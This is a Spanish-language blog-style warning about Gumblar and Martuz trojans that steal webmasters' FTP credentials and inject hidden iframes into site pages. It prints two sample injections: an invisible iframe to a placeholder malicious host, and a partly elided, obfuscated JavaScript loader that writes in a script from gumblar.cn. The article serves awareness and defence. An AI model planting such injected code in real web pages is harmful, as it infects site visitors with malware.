Mucho ojo con los virus compañero cibernauta.
Resulta que ha habido un notorio incremento en los ataques de inyección de código proveniente de virus colocados en sitios web de Internet de forma invisible.
Últimamente a aumentado la cantidad de reportes de parte de muchos webmasters los cuales dicen notar que en muchos de los documentos que forman su sitio web aparecen ciertas líneas de código extrañas las cuales muestran enlaces hacia sitios externos y que están puestos de forma invisible.
Todo esto tiene que ver con un código el cual no ha sido introducido por el webmaster, ni siquiera por el editor web sino que se trata de un virus troyano el cual una vez haya infectado la PC del webmaster se dedica a detectar códigos ftp en el ordenador y luego los utiliza para colocar el iframe (elemento HTML que permite insertar o incrustar un documento HTML dentro de un documento HTML principal.) en los documentos del mismo sitio web.
Hay páginas que tienen mayor rango de frecuencia a ser afectadas por este virus, estas son: las páginas de tipo index.php, index.htm, index.html.
Incluso en ocasiones hay casos en que el sitio web es dinámico y que está basado en plantillas, tpls etc. Y tienden a verse afectados todos los archivos.
Este tipo de virus tiende a tomar ventaja de versiones antiguas existentes como Adobe Reader, muy utilizado para abrir formatos pdfs, o Adobe Flash Player, el cual sirve para ejecutar películas de Flash, aunque en ocasiones tiende a producirse a través de otros programas.
Esta forma, la de inyectar un iframe en el o los documentos HTML que componen el sitio web, suele ser la forma más habitual de infección.
He aquí dos ejemplos de códigos maliciosos inyectados:
<iframe src=”http://sitiomalicioso:8080/index.php” mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe>
Este es otro código solo más complejo:
(function(jil){var xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);.
Estos códigos son provocados por troyanos del tipo Gumblar, Martuz o algún variante.